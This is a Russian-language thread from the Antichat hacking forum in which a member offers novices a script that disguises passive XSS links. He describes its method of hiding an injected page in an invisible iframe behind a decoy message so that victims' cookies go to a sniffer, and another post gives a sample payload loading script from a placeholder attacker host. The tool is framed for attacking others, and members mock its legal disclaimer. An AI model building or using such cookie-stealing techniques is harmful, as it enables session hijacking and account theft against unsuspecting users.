HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Чаты
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Для новичков (пассивные Xss)
  #1  
Старый 05.07.2006, 16:31
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
С нами: 11150246

Репутация: 412


Exclamation Для новичков (пассивные Xss)

Дело было давно... я написал вот такой простенький скрипт.
он предназначен для тех, кому в этом разделе указали на пассивные XSS.
Если вы не знаете, что с ними делать, заходите сюда:
http://www.dron-anarchy.jino-net.ru/xss/XSS.php

Идея не нова(как просвятил меня NOFEAR)
но скрипт написан уже давно, а выложен совсемнедавно(ввиду жутких проблем с нетом)
так что пользуйте, о новички этой темы=)
 

  #2  
Старый 05.07.2006, 18:07
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами: 11058146

Репутация: 4536


По умолчанию

Типа http://loc.netsec.ru/ ?

Цитата:
При запросе страницы с сайта нашего пользователя произошла ошибка 404. Запрашиваемый файл не найден. Проверьте правильность ввода URL.
=))
 

  #3  
Старый 26.07.2006, 10:41
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
С нами: 11150246

Репутация: 412


По умолчанию

типа да. Но где ты узрел 404 я не знаю...
Плюс ко всему я понял, что люди неисправимы... я посмотрел, чем забивают скрипт..туда пишут просто названия чатов, сайтов и т.п. типа скрипт сам должен искать уязвимости...Хоть бы инструкции читали...=(
 

  #4  
Старый 21.05.2007, 21:13
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами: 10077446

Репутация: 3965


По умолчанию

Молоток, што скрипт закинул
гы, но ето ЛОЛ чистой воды
Цитата:
1 . Запрещается использовать скрипт в целях, противоречащих законодательству РФ
2. Запрещается использование скрипта для нанесения вреда другим пользователям
А для чего ты его используеш?
----------------------------------------------------------------
Претензий не имею, все ОК!

Последний раз редактировалось Dimi4; 21.05.2007 в 21:16..
 

  #5  
Старый 21.05.2007, 22:52
Антошка2003
Постоянный
Регистрация: 03.04.2005
Сообщений: 610
С нами: 11107106

Репутация: 165


По умолчанию

в целях проверки
 

  #6  
Старый 27.05.2007, 12:25
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
С нами: 11150246

Репутация: 412


По умолчанию

лол чистой воды?))
гыгыгыы

Антошка2003 +1
 

  #7  
Старый 04.06.2007, 12:43
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами: 10077446

Репутация: 3965


По умолчанию

Цитата:
Сообщение от DRON-ANARCHY  
лол чистой воды?))
гыгыгыы

Антошка2003 +1
Ты прав, сейчас чистой воды небивает
 

  #8  
Старый 23.06.2007, 22:44
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
С нами: 10721066

Репутация: 4360


По умолчанию

Он просто генерирует непалевную ссылку для пассивной ксс.. чтобы было типа dron-anarchy.blablabla.com/43950923485029384.html а не somechat.ru/chat.php?param=<script src='http://myhost.com/a.js'></script>
 

  #9  
Старый 14.07.2007, 14:49
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
С нами: 11150246

Репутация: 412


По умолчанию

О... некрофилия процветает. Опять этот топик подняли со дна)))
по такому случаю надо пойти и залить более-менее нормальную версию на скачку

обновил. Опять просмотрел все сгенерированные файлы... никто не пользуется почти по назначению. все пишут название сайта и ждут пока скрипт найдет там XSS гыгы

Последний раз редактировалось DRON-ANARCHY; 14.07.2007 в 15:01..
 

  #10  
Старый 14.07.2007, 15:27
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
С нами: 11150246

Репутация: 412


По умолчанию

кстати
Цитата:
Сообщение от Слип  
Не фейк, скорее перенаправление скриптом. Пользователь открывает ссылку, обращается к срипту, скрипт берёт из бд записанную ссылку, и уже перенаправляет браузер на исходную ссылку.
Нет. Не так.
Т.к. скрипт работает без баз данных(думаю, понятно по какой причине) то все делается так:
скрипт создает страницу, содержащую невидимый фрейм, в который грузится страница с вставленным XSS-кодом. Тебе дается ссылка на страницу, при заходе на которую ты видишь грустную новость о том, что что-то там не активно. Если ты совсем параноик, то смотришь в исходный код и о чудо, благодаря модификации скрипта ничего вразумительного там не находишь. Со спокойной душой закрываешь страницу и идешь спать. А куки уже улетели через фрейм на сниффер.
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
какОй трой ИСпоЛЬзоваТЬ длЯ поЛНого УПРАвЛЕиЕ уд.КОМПОМ? UnKn0wN Уязвимости Mail-сервис 32 08.04.2006 04:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.